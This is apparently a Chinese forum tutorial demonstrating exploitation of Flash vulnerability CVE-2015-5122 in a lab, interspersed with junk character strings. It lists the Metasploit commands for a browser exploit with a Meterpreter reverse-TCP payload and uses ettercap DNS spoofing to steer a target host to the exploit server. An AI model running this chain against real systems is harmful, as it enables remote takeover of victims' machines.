cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

q: s! j( Q1 F4 S& v- z 二、cve2015-5122漏洞实例演示虚拟机 : |% d: T. ?) R6 a" e8 _

+ L; Y0 S! ^6 M- } 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 7 h5 L' n: H7 K5 p. g% I; Q* V

" A1 w1 C. K9 ~+ H search cve-2015-5122如图： 4 B6 Z# }' e7 L1 M

3 g7 {; R& _, ~( H) n, @ ) ^& J- V% W3 p4 l/ @) B) _) x

8 y, G* s2 @6 K, | 下面我们敲如下命令： " P6 u6 V$ o: k* X g

& t/ L' e1 [1 |: W use exploit/multi/browser/adobe_flash_opaque_background_uaf . ?4 b" Z9 C) s0 k9 O7 X

$ e3 D* b+ n" d5 [7 Z7 N0 b set PAYLOAD windows/meterpreter/reverse_tcp * O k* r! O- _8 f8 _+ {

2 J" z5 b) {' A& {) p. E6 {6 t: q set LHOST 192.168.0.109 : L( F5 N! j& G& _

Q3 U5 A4 K5 |- i: A" e4 @ set URIPATH / /*根目录*/ 7 N2 M& r5 n8 Q. n' p

2 N) H3 ] a' }! N5 I set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 7 H9 r3 z% k. k* T# K

. B6 w! S1 {/ x! B% b9 e set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 0 f) H. K F) b0 r# c0 B( x+ k. k

' l; i0 g8 w1 j$ Z! r+ @; F* L 然后show options如图： 0 ]3 m* K: u% \: K0 O0 Y$ L

1 m, r; x7 Q, P3 A' @ 0 V; l0 s0 f3 S+ X4 m

- G4 W: @% Y* {; e 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
3 @3 J2 B$ w- w2 U8 l$ B9 n( c 6 w6 |& P; X5 k! z

: Y) y5 z I0 [+ ] 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 9 v% W) n9 ]+ t5 u

) d" f7 J/ {+ ]5 p Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ; B3 F+ `! @+ w9 i. A$ J$ H

6 Q9 w" R I! }" n k% M/ w2 U u+ j+ ?

* G5 v# J6 Y" v$ f 成功了，这时候我们断开ettercap，如图： 0 Z! [: n4 Z% l# O6 V

4 K: H1 f0 v0 B: w: l 3 h1 _2 V+ X, i8 O1 d+ x

. m' F1 ?/ Z' r, B1 o0 s( [6 n Screenshot如图： " I- Q2 Q8 I! A9 E0 @: J

7 I) U* |* _6 @0 G; a P / g n# d0 j; Y# [. T9 K" H

8 } N( N; A6 v. m; ~' R `$ W " l% j9 M, \ }- X$ W( w6 K

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块